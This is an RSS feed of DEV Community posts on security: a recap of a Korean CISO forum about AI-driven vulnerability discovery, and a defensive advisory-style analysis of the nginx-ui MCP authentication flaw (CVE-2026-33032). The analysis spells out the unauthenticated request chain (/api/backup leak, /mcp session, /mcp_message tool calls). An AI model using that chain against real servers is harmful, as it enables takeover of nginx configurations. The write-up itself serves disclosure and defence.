<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: 김형운</title>
    <description>The latest articles on DEV Community by 김형운 (@silask).</description>
    <link>https://dev.to/silask</link>
    
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/silask"/>
    <language>en</language>
    <item>
      <title>Mythos and the Defender Time That Vanished</title>
      <dc:creator>김형운</dc:creator>
      <pubDate>Tue, 28 Apr 2026 15:51:57 +0000</pubDate>
      <link>https://dev.to/silask/mythos-and-the-defender-time-that-vanished-2kmg</link>
      <guid>https://dev.to/silask/mythos-and-the-defender-time-that-vanished-2kmg</guid>
      <description>&lt;p&gt;On April 7, 2026, Anthropic released Claude Mythos Preview into Project Glasswing, a limited-access program. Twelve launch partners — AWS, Apple, Broadcom, Cisco, CrowdStrike, Google, JPMorgan Chase, Linux Foundation, Microsoft, NVIDIA, Palo Alto Networks, and Anthropic — got first access, with 40+ additional organizations behind them. No Korean firm appears on the list.&lt;/p&gt;

&lt;p&gt;In Anthropic's own evaluations, Mythos autonomously found thousands of zero-day vulnerabilities across every major operating system and web browser, including a 27-year-old integer overflow in OpenBSD's TCP SACK implementation. It produced a working proof-of-concept on the first attempt 83.1% of the time. Anthropic called the model "too powerful to release publicly" and held it back from general availability.&lt;/p&gt;

&lt;p&gt;Sixteen days later, on April 23, Korean CISOs gathered at the 2026 CISO Insight Forum. This piece reads the Forum for the structural shifts it surfaced, organized around the changes themselves rather than the speaking order.&lt;/p&gt;




&lt;h2&gt;
  
  
  1. Two things Mythos changed
&lt;/h2&gt;

&lt;p&gt;Traditional vulnerability discovery had three steps. &lt;strong&gt;Discovery&lt;/strong&gt; of a candidate flaw. &lt;strong&gt;Validation&lt;/strong&gt; that it's real. &lt;strong&gt;Exploitation&lt;/strong&gt; — building a working PoC. Each step needed different people, different tools, different context. The friction between them was the defender's grace period.&lt;/p&gt;

&lt;p&gt;Mythos collapses all three into a single agentic loop. The published scaffold is minimal: an isolated container with no internet, the target source code inside, a one-paragraph prompt asking the model to find a security vulnerability. Then you let it run. The model reads code, hypothesizes, executes the program to confirm, drops into a debugger, and outputs a bug report with a working PoC.&lt;/p&gt;

&lt;p&gt;Two things changed here.&lt;/p&gt;

&lt;p&gt;One, &lt;strong&gt;the human time between discovery and exploit is gone&lt;/strong&gt;. Time cost was tied to human salary and human learning curves. Defender patch windows were sized against that friction. Remove the friction and the patch SLA needs a new unit of measure.&lt;/p&gt;

&lt;p&gt;Two, &lt;strong&gt;the cost floor for attacks collapsed&lt;/strong&gt;. Anthropic's published numbers put 1,000 OpenBSD scans at under $20,000. For comparison: a 2025 enterprise penetration test runs $10K–$35K. So one pentest's budget covered 1,000 sweeps of a single major OS. Run the same math against every major open-source project and the picture writes itself. Risk models that assumed "attacks are expensive" need to be redrawn.&lt;/p&gt;

&lt;p&gt;The same capability serves defenders, but almost no Korean CISO has access to a Mythos-grade tool. &lt;strong&gt;Capability arrives at attackers first and at defenders later.&lt;/strong&gt; That asymmetry is policy, not technology.&lt;/p&gt;




&lt;h2&gt;
  
  
  2. Korean AI policies sit on top of Generation 1
&lt;/h2&gt;

&lt;p&gt;Korean enterprises spent the last 18 months drafting AI usage policies that assume Generation 1 — the user asks, the model answers. "Review AI-generated content before sending." "Don't paste customer data into ChatGPT." Rules built on top of single-shot Q&amp;amp;A.&lt;/p&gt;

&lt;p&gt;That isn't where AI is going. Generation 2 is agentic execution: the user states a goal, the model plans and acts. Vibe coding lives here. Generation 3 is multi-agent: a high-level objective, agents talking to other agents to produce results.&lt;/p&gt;

&lt;p&gt;Generation 3 can't be governed by Generation 1 rules. By the time a human is in the loop, dozens of agent decisions have already happened. &lt;strong&gt;Auditing what an agent did becomes a forensic problem, not a real-time control problem.&lt;/strong&gt; That requires agent activity logs at a granularity most organizations don't have. Korean enterprises included.&lt;/p&gt;

&lt;p&gt;There's a trade-off. Companies that block Generation 3 lose the productivity race. Companies that adopt it without audit infrastructure lose the compliance race. There's no middle path without new tooling.&lt;/p&gt;

&lt;p&gt;Vibe coding produces a parallel rule. &lt;strong&gt;Don't hand-edit AI-generated code.&lt;/strong&gt; The moment you do, the agent's context breaks. The next agent edit lands on top of your edit and the code degrades faster. Push corrections back through the agent. That's a real shift in what code review means, and most security teams haven't internalized it yet.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F14d54o0qwztq9nwiqki2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F14d54o0qwztq9nwiqki2.png" alt="Policy parked at Generation 1 while real usage covers Gen 2 and Gen 3" width="800" height="467"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  3. The unit of attack surface has changed
&lt;/h2&gt;

&lt;p&gt;Frontier models now process text, audio, video, documents, meeting recordings — all in a single pass. The change that creates is a change of unit.&lt;/p&gt;

&lt;p&gt;Thinking about attack surface in units of "this codebase" or "this document" no longer holds. The new unit is &lt;strong&gt;everything that flows into a single model invocation&lt;/strong&gt;, regardless of where that data physically sits. If it's in the same session, it's in the same exposure.&lt;/p&gt;

&lt;p&gt;There's another trade-off here. Restrict context and you restrict your own analysts' capacity. Mythos-grade vulnerability discovery doesn't work without the model reading a full codebase in context. The same property creates the offensive risk and the defensive capability. The right move isn't input restriction, it's &lt;strong&gt;logged exposure with scoped controls&lt;/strong&gt; — knowing which data went into which model call.&lt;/p&gt;

&lt;p&gt;Shadow AI deepens this problem. SBOMs run on the assumption that you know what software is running inside the company. Shadow AI breaks that assumption a level deeper than shadow IT ever did. An employee uses ChatGPT or Claude through a personal account on a personal device, then pastes the output into work systems. The "tool" never touches the corporate network.&lt;/p&gt;

&lt;p&gt;So the control point has to move. Not "what tools are employees allowed to use," but &lt;strong&gt;"what data are they allowed to handle"&lt;/strong&gt;. That's an HR and labor-policy problem before it's a technical one.&lt;/p&gt;




&lt;h2&gt;
  
  
  4. Board reporting is now a legal requirement, and translation doesn't carry the room
&lt;/h2&gt;

&lt;p&gt;In 2026, Korean law moves board-level security reporting from "good practice" to "legally required." Three changes drive it. The &lt;strong&gt;Personal Information Protection Act&lt;/strong&gt; now requires CPO appointment and dismissal to go through the board, and adds a board reporting obligation for privacy posture. The &lt;strong&gt;Information &amp;amp; Communications Network Act&lt;/strong&gt; adds a parallel reporting obligation for information protection status. The &lt;strong&gt;Electronic Financial Supervisory Regulation&lt;/strong&gt; is already in force — CISO must report to the board, not just the CEO.&lt;/p&gt;

&lt;p&gt;Press will summarize this as "CISOs must now report to boards." True and uninteresting. The interesting question is &lt;em&gt;why most CISOs will fail at this reporting&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;CISOs typically prepare for a board session by translating technical material into accessible language. That doesn't work. Korean corporate boards are dominated by lawyers and business-school graduates. Sociotechnical risk language — CVEs, attack surfaces, MITRE ATT&amp;amp;CK matrices — doesn't land. The translation isn't bad. The attempt itself wastes the slot.&lt;/p&gt;

&lt;p&gt;Start in business language. Boards want four data points.&lt;/p&gt;

&lt;p&gt;One — &lt;strong&gt;risk in monetary terms&lt;/strong&gt;. Not CVSS scores. The expected loss from an unpatched exposure if it becomes an incident.&lt;/p&gt;

&lt;p&gt;Two — &lt;strong&gt;maturity against a recognized standard&lt;/strong&gt;. NIST CSF, Zero Trust framework levels. "We're at level 2 of 4."&lt;/p&gt;

&lt;p&gt;Three — &lt;strong&gt;compliance posture&lt;/strong&gt;. PIPA, GDPR, Network Act — exposure to penalties under current and pending regulation.&lt;/p&gt;

&lt;p&gt;Four — &lt;strong&gt;supply-chain risk&lt;/strong&gt;. Most modern breaches enter through supply chain. Boards have started asking about it.&lt;/p&gt;

&lt;p&gt;ISMS-P certification is the first thing Korean CISOs reach for to show the board "we're handling this." But ISMS-P was designed as an operational compliance standard, not a board communication tool. It shows whether you're patching things. It doesn't show whether your unpatched exposure is worth ₩100M or ₩10B in expected loss. The board needs the second number. ISMS-P doesn't produce it.&lt;/p&gt;

&lt;p&gt;A quantitative risk model has to layer on top of ISMS-P, not replace it. Right direction, meaningful operational lift, and most Korean CISOs haven't started.&lt;/p&gt;

&lt;p&gt;One more thing. Secure your allies before the formal board meeting. Pre-meetings with the CFO and one or two friendly outside directors aren't optional. The actual board session is the wrong place to surface a controversial finding. The right place is the prep meeting, where you can lose without losing publicly. Has nothing to do with security and everything to do with surviving as a CISO long enough to do the security work.&lt;/p&gt;




&lt;h2&gt;
  
  
  5. Disclosure, repurposed as competitive pressure
&lt;/h2&gt;

&lt;p&gt;Korea's information protection disclosure regime makes four things public and audited: information protection investment, workforce composition, certifications held, security activities. Most CISOs skim this regime because it looks administrative. Mistake.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;In 2024, the law added post-hoc verification authority&lt;/strong&gt; — the regulator can now check what was disclosed. Before that, filings were essentially what companies wrote. Now they aren't.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Then in 2027, the exclusion thresholds disappear.&lt;/strong&gt; Companies that had been below the cutoff start filing.&lt;/p&gt;

&lt;p&gt;Once filings are public and compared year over year, &lt;strong&gt;competitive pressure replaces regulatory pressure as the primary driver&lt;/strong&gt;. A peer in your sector with a higher security investment ratio shows up in a filing that customers and audit committees both read. Annually. Compared to last year's, and compared to peers.&lt;/p&gt;

&lt;p&gt;That shifts the political center of gravity inside the company. Security budget stops being a fight for IT-spend share and becomes a question of where you sit on a public benchmark. The CISO suddenly holds a number the CFO has to defend externally. ISMS-P certification status sits in the public artifact. The certification stops being something you renew quietly every three years and becomes something the market reads.&lt;/p&gt;




&lt;h2&gt;
  
  
  6. Dynamic access control — externalizing tacit knowledge
&lt;/h2&gt;

&lt;p&gt;The shifts above all push the same question at operators: &lt;em&gt;what can you actually do today, without Mythos-grade tooling?&lt;/em&gt; The Forum's most operationally specific answer was dynamic access control.&lt;/p&gt;

&lt;p&gt;Korean enterprise access controls have been binary. You have permission or you don't. Employees who need access to personal information get exception-permissions, and those exceptions stay open.&lt;/p&gt;

&lt;p&gt;Revalidating those exceptions dynamically is the alternative. Examples: a privileged user accessing the same data through VPN gets masked output. If the VPN-source IP matches a less-trusted endpoint, that's another signal. If a DBA's badge-in record isn't in the system this morning, their DB access is suspended.&lt;/p&gt;

&lt;p&gt;What makes this interesting is the choice of signals. &lt;strong&gt;Operational signals nobody else queries&lt;/strong&gt; — badge-in records, IP reputation deltas, peer behavior baselines — get pulled into authorization decisions. Familiar territory in zero-trust literature, but the implementation cues are different.&lt;/p&gt;

&lt;p&gt;There's a deeper point underneath. The "abnormal" in anomaly detection mostly lives as tacit knowledge in CISOs' heads. "User X is sketchy" is a judgment that doesn't sit in any system. The dynamic control project is about &lt;strong&gt;externalizing that tacit knowledge into systematic signals&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;This is harder than it looks. The moment a rule is formalized, it becomes gameable. Anyone trying to evade just routes around it. But the direction is right. Without formalizing and systematizing the concept of "abnormal," dynamic control doesn't actually run.&lt;/p&gt;

&lt;p&gt;The same principle applies to pre-launch security review. Business teams skip it. There's a limit to how much you can prevent that. When skipping happens, run a post-implementation review. Document the gaps. List them. Escalate to executives. Preserve the paper trail. &lt;strong&gt;Not a control that prevents the skip. A control that ensures responsibility lands in the right place when a skip turns into an incident.&lt;/strong&gt; Honest, and operationally workable.&lt;/p&gt;

&lt;p&gt;This is the operational answer to "AI defense requires AI." Pattern-based security tools were built around static signatures. Post-Mythos attacks are context-driven — they reason, they chain. The only thing fast enough to defend against context-driven attacks is something that reasons in context. That's an AI system. Which is why AI security teams need dedicated personnel — not a generalist who also covers AI, but a specialist whose job is the AI defense layer.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9wlc9ndw7o9s99kunff2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9wlc9ndw7o9s99kunff2.png" alt="Tacit " width="800" height="467"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  7. The asymmetry Korea is facing
&lt;/h2&gt;

&lt;p&gt;One gap to close on.&lt;/p&gt;

&lt;p&gt;Mythos exists. Glasswing exists. AWS, Microsoft, Google, NVIDIA, Palo Alto Networks have access. No Korean firm is on the list.&lt;/p&gt;

&lt;p&gt;The implicit assumption running through every Forum discussion was that Korean CISOs need to &lt;em&gt;prepare for&lt;/em&gt; AI-driven attacks. The honest framing is that Korean CISOs need to prepare for AI-driven attacks &lt;strong&gt;without&lt;/strong&gt; access to AI-driven defense at the same tier. The asymmetry is structural. By the time Mythos-equivalent capability is commercially available in Korea, the same capability will have been adversarial for some time.&lt;/p&gt;

&lt;p&gt;That's the conversation the Forum didn't have. Also the most important one. The threat model, the board reporting mandate, the disclosure regime, the dynamic controls — all correct, all important. None of them resolve the asymmetry.&lt;/p&gt;

&lt;p&gt;Three directions might shrink it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Domestic security AI tooling&lt;/strong&gt; — built defensively, designed for Korean compliance and Korean-language constraints. There's a view that the government's foundation-model push lost some strategic urgency post-Mythos. There's a case for re-pointing the goal — from "sovereign model" to "defensive AI."&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Open-source defensive tooling&lt;/strong&gt; — the Linux Foundation sits in the Glasswing launch partner list, which matters. Korean CISOs should track these projects actively rather than wait for vendor productization.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Operational discipline that doesn't need Mythos-grade tooling&lt;/strong&gt; — dynamic access control is the example. Achievable today with existing infrastructure plus better signal integration.&lt;/p&gt;

&lt;p&gt;The CISO's job in 2026 isn't to wait for Mythos-grade defense to land in Korea. It's to do everything that doesn't require it, and to prepare the ground for absorbing it the moment it arrives. That's a shorter list than people think. The Forum's value was in mapping it.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>ai</category>
      <category>infosec</category>
      <category>governance</category>
    </item>
    <item>
      <title>nginx-ui's MCP endpoint shipped with 'empty allowlist equals allow-all' — and that's the story worth sitting with</title>
      <dc:creator>김형운</dc:creator>
      <pubDate>Mon, 27 Apr 2026 03:38:19 +0000</pubDate>
      <link>https://dev.to/silask/nginx-uis-mcp-endpoint-shipped-with-empty-allowlist-equals-allow-all-and-thats-the-story-5fee</link>
      <guid>https://dev.to/silask/nginx-uis-mcp-endpoint-shipped-with-empty-allowlist-equals-allow-all-and-thats-the-story-5fee</guid>
      <description>&lt;h2&gt;
  
  
  What happened
&lt;/h2&gt;

&lt;p&gt;On 2026-03-15, the nginx-ui maintainers released version 2.3.4. The release fixed a missing authentication check on a single HTTP endpoint. That endpoint is &lt;code&gt;/mcp_message&lt;/code&gt;, the delivery path for the Model Context Protocol integration the project had added to let AI tools manage nginx configurations.&lt;/p&gt;

&lt;p&gt;The advisory describes the shape of the problem in one paragraph. "The nginx-ui MCP (Model Context Protocol) integration exposes two HTTP endpoints: &lt;code&gt;/mcp&lt;/code&gt; and &lt;code&gt;/mcp_message&lt;/code&gt;. While &lt;code&gt;/mcp&lt;/code&gt; requires both IP whitelisting and authentication (&lt;code&gt;AuthRequired()&lt;/code&gt; middleware), the &lt;code&gt;/mcp_message&lt;/code&gt; endpoint only applies IP whitelisting — and the default IP whitelist is empty, which the middleware treats as 'allow all'."&lt;/p&gt;

&lt;p&gt;The consequence, in the advisory's own words, is that "any network attacker can invoke all MCP tools without authentication, including restarting nginx, creating/modifying/deleting nginx configuration files, and triggering automatic config reloads — achieving complete nginx service takeover."&lt;/p&gt;

&lt;p&gt;The CVE is CVE-2026-33032, CVSS 9.8, class: missing authentication. The finder is Yotam Perkal of Pluto Security, who published a technical writeup alongside the fix and codenamed the bug "MCPwn."&lt;/p&gt;

&lt;h2&gt;
  
  
  What is Confirmed vs Reported vs Claimed
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Confirmed&lt;/strong&gt; (primary source or NVD record):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The two endpoints, the middleware mismatch, and the "empty allowlist equals allow-all" default — all direct from the maintainers' advisory.&lt;/li&gt;
&lt;li&gt;CVSS 9.8. Missing-authentication class.&lt;/li&gt;
&lt;li&gt;Fix released in version 2.3.4 on 2026-03-15.&lt;/li&gt;
&lt;li&gt;Workarounds: add &lt;code&gt;middleware.AuthRequired()&lt;/code&gt; to &lt;code&gt;/mcp_message&lt;/code&gt;, or change the IP allowlist default to deny-all.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Reported&lt;/strong&gt; (multiple independent secondary outlets — The Hacker News, Security Affairs, Rapid7):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Exploitation in the wild since March 2026, per Recorded Future's 2026-04-13 report cited by Rapid7.&lt;/li&gt;
&lt;li&gt;Chaining with CVE-2026-27944 (CVSS 9.8, an unauthenticated information-leak on &lt;code&gt;/api/backup&lt;/code&gt; that exposes the &lt;code&gt;node_secret&lt;/code&gt; required to open a session on &lt;code&gt;/mcp&lt;/code&gt;). Fixed in 2.3.3.&lt;/li&gt;
&lt;li&gt;Approximately 2,600 publicly reachable nginx-ui instances per Pluto Security's scan, ~2,689 per Shodan data cited by The Hacker News, with most located in China, the U.S., Indonesia, Germany, and Hong Kong. These are exposure counts, not compromise counts.&lt;/li&gt;
&lt;li&gt;Affected-version reporting is inconsistent across advisories: the finder's blog lists ≤ 2.3.3 as vulnerable; the NVD record lists ≤ 2.3.5. Rapid7 recommends updating to 2.3.6 to avoid the ambiguity.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Claimed&lt;/strong&gt; (single-source, explicitly attributed):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Perkal's structural explanation: "When you bolt MCP onto an existing application, the MCP endpoints inherit the application's full capabilities but not necessarily its security controls. The result is a backdoor that bypasses every authentication mechanism the application was carefully built with." This is his quote, and we cite it as his.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  The chain, step by step
&lt;/h2&gt;

&lt;p&gt;Only the hops the sources actually describe.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1 — Leak the &lt;code&gt;node_secret&lt;/code&gt;.&lt;/strong&gt; The attacker issues an unauthenticated request to &lt;code&gt;/api/backup&lt;/code&gt;. On nginx-ui versions before 2.3.3, that endpoint returns enough information to recover the &lt;code&gt;node_secret&lt;/code&gt; value, the query parameter that authenticates the MCP interface. This step is CVE-2026-27944, reported by The Hacker News and Rapid7 as being chained in active exploitation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 2 — Open the MCP session.&lt;/strong&gt; The attacker issues &lt;code&gt;GET /mcp?node_secret=xxx&lt;/code&gt; to establish a server-sent-events session and receive a &lt;code&gt;sessionId&lt;/code&gt;. The advisory confirms this endpoint is protected by both IP allowlist and &lt;code&gt;AuthRequired()&lt;/code&gt;. The &lt;code&gt;node_secret&lt;/code&gt; obtained in step 1 satisfies the auth side; the empty-allowlist default satisfies the network side.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 3 — Invoke tools on &lt;code&gt;/mcp_message&lt;/code&gt;.&lt;/strong&gt; The attacker issues &lt;code&gt;POST /mcp_message?sessionId=xxx&lt;/code&gt; carrying the tool-invocation payload. No &lt;code&gt;node_secret&lt;/code&gt;, no JWT, no cookies. Because &lt;code&gt;/mcp_message&lt;/code&gt; is only gated by the same empty allowlist, the request is accepted. Per the advisory, the invocable tools include restarting nginx, creating / modifying / deleting configuration files, and triggering automatic reloads.&lt;/p&gt;

&lt;p&gt;Two HTTP requests in total, if the attacker already holds the &lt;code&gt;node_secret&lt;/code&gt;. Three, if they also have to chain the backup leak.&lt;/p&gt;

&lt;h2&gt;
  
  
  The broken assumption
&lt;/h2&gt;

&lt;p&gt;The design intent reads well. Two endpoints, both behind &lt;code&gt;AuthRequired()&lt;/code&gt; in intent, both behind an IP allowlist. Defense in depth. What shipped was different.&lt;/p&gt;

&lt;p&gt;Two separate assumptions failed together.&lt;/p&gt;

&lt;p&gt;The first failed assumption is that every privileged endpoint in a family would be wired to the same authentication middleware. &lt;code&gt;/mcp&lt;/code&gt; was. &lt;code&gt;/mcp_message&lt;/code&gt; was not. One line of code separated "authenticated" from "unauthenticated," and that line was absent for the endpoint that carried the write operations. Security Affairs notes that the 2.3.4 fix added that missing line and a regression test so the same kind of omission cannot silently recur.&lt;/p&gt;

&lt;p&gt;The second failed assumption is that the IP allowlist would be meaningful at runtime. The allowlist's default was empty. The middleware treated empty as allow-all. So the network control that was supposed to sit beneath the authentication control sat at zero as well. Two defenses, both disabled at their defaults, on the same endpoint.&lt;/p&gt;

&lt;p&gt;Neither assumption is unique to this project. Both describe the general shape of what happens when MCP — a protocol whose value is that AI tools can drive application internals — is added to an application that already has authentication, but whose authentication is wired by convention rather than by a single enforcement point.&lt;/p&gt;

&lt;p&gt;Perkal states the structural version of this directly: "the MCP endpoints inherit the application's full capabilities but not necessarily its security controls." Treat that as his claim, not ours. But the class of failure matches what the advisory says happened here.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why detection gets harder
&lt;/h2&gt;

&lt;p&gt;The exposed surface is a management UI that normally sits in an internal or administrative network. The exploit uses two HTTP requests that look, on the wire, like the product's own MCP traffic. There is no malware signature. There is no credential stuffing pattern. A defender watching authentication logs sees a successful session. A defender watching network logs sees traffic to the product's own ports.&lt;/p&gt;

&lt;p&gt;The only reliable detection signal is the one the application itself would have to produce: "this &lt;code&gt;/mcp_message&lt;/code&gt; invocation was served without a verified identity." On a vulnerable version, that signal does not exist, because the endpoint does not check for identity. Detection has to shift to the outside — to whether the &lt;code&gt;/mcp_message&lt;/code&gt; endpoint is reachable from the network at all, and whether the config-change events it produces are consistent with the change-management trail your operators expect.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to check this week
&lt;/h2&gt;

&lt;p&gt;Operational, in priority order.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Inventory nginx-ui deployments.&lt;/strong&gt; Run an internal scan for port 9000 and any known nginx-ui hostnames. The Shodan-derived public-surface count is ~2,600; your internal surface is typically larger.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Patch status.&lt;/strong&gt; If any instance is at 2.3.3 or earlier, the &lt;code&gt;/api/backup&lt;/code&gt; information leak (CVE-2026-27944) is usable to harvest the &lt;code&gt;node_secret&lt;/code&gt;. If any instance is at 2.3.4 or earlier per the NVD record's stated coverage (≤ 2.3.5), treat it as exposed to CVE-2026-33032. Rapid7's guidance to go straight to 2.3.6 is the cleanest way to eliminate the version-number ambiguity.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Exposure cutoff.&lt;/strong&gt; Confirm the management interface is not reachable from any network segment that carries untrusted users. If the workaround path is the only option, change the IP allowlist default from empty to an explicit deny-all, and add &lt;code&gt;middleware.AuthRequired()&lt;/code&gt; to &lt;code&gt;/mcp_message&lt;/code&gt; per the advisory.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Change audit on managed nginx configs.&lt;/strong&gt; Compare the on-disk nginx config files against the last known-good revision. An attacker who succeeded would leave their signal there, not in the UI logs. Pay attention to any additions that introduce new &lt;code&gt;proxy_pass&lt;/code&gt; targets, new upstream blocks, or new &lt;code&gt;log_format&lt;/code&gt; definitions that could capture credentials.&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  What to change in policy
&lt;/h2&gt;

&lt;p&gt;One policy change has high leverage.&lt;/p&gt;

&lt;p&gt;Treat any MCP endpoint as privileged by default — at the same tier as an admin RPC — regardless of what the rest of the application looks like. In this case, the nginx-ui codebase already had &lt;code&gt;AuthRequired()&lt;/code&gt;. The bug was that not every MCP endpoint was behind it. The preventive rule is to require, as a code-review gate, that every route registered by the MCP integration passes through a single enforcement point, and that a regression test fails the build if a new route skips it. Security Affairs reports this is exactly what the 2.3.4 release added.&lt;/p&gt;

&lt;p&gt;Two secondary rules follow from the same posture.&lt;/p&gt;

&lt;p&gt;First, "empty allowlist equals allow-all" is a footgun that only makes sense in development. In production it is an outage waiting to happen. Allowlists should fail closed. A configuration loader that sees an empty list should refuse to start, not accept everything.&lt;/p&gt;

&lt;p&gt;Second, when a project adds MCP — or any AI-integration surface that exposes the application's capabilities as callable tools — the threat model should be re-run specifically for that surface, not inherited from the rest of the app. Capability exposure is the part of MCP that is new. Authentication is the part that is assumed.&lt;/p&gt;

&lt;h2&gt;
  
  
  What this does NOT say
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;This post does not name any organization as an exploited victim. No source does.&lt;/li&gt;
&lt;li&gt;It does not count compromised instances. The ~2,600 figure is exposed surface per a Pluto Security scan, not a tally of successful exploits.&lt;/li&gt;
&lt;li&gt;It does not attribute the in-the-wild exploitation to a threat group. None was named.&lt;/li&gt;
&lt;li&gt;It does not claim the allow-all default was an intentional design choice or an implementation bug. The advisory does not say which, and neither does this post.&lt;/li&gt;
&lt;li&gt;It does not generalize from this CVE to claims about MCP as a protocol. The specific failure here is an application-level mis-wiring that happens to be on MCP endpoints. The broader pattern Perkal describes — bolting MCP onto an existing app — is his statement, and we leave it as his.&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;strong&gt;Sources&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Primary: nginx-ui maintainers' advisory (release 2.3.4, 2026-03-15); Pluto Security technical blog (Yotam Perkal, 2026-03-15); NVD CVE-2026-33032.&lt;/li&gt;
&lt;li&gt;Secondary: Rapid7 Emerging Threat Response (2026-04-16, updated 2026-04-17); The Hacker News (2026-04-15); Security Affairs (2026-04-15); Cyber Security Agency of Singapore alert AL-2026-039.
&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu33hnpcd9jsqfwmbtnyd.png" alt=" " width="800" height="450"&gt;
&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fww90c6zi5m1m7a0wuieb.png" alt=" " width="800" height="450"&gt;
&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp8ap9klbyes54xw6635x.png" alt=" " width="800" height="450"&gt;
&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>security</category>
      <category>mcp</category>
      <category>nginx</category>
      <category>appsec</category>
    </item>
    <item>
      <title>The Vercel/Context.ai Breach Wasn't a Vulnerability. It Was a Delegation Path.</title>
      <dc:creator>김형운</dc:creator>
      <pubDate>Wed, 22 Apr 2026 07:33:37 +0000</pubDate>
      <link>https://dev.to/silask/the-vercelcontextai-breach-wasnt-a-vulnerability-it-was-a-delegation-path-3o3b</link>
      <guid>https://dev.to/silask/the-vercelcontextai-breach-wasnt-a-vulnerability-it-was-a-delegation-path-3o3b</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftls0kt2sjtf7356xxm85.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftls0kt2sjtf7356xxm85.png" alt=" " width="800" height="450"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feaxp4vj9tzggd3snja4c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feaxp4vj9tzggd3snja4c.png" alt=" " width="800" height="450"&gt;&lt;/a&gt;&lt;br&gt;
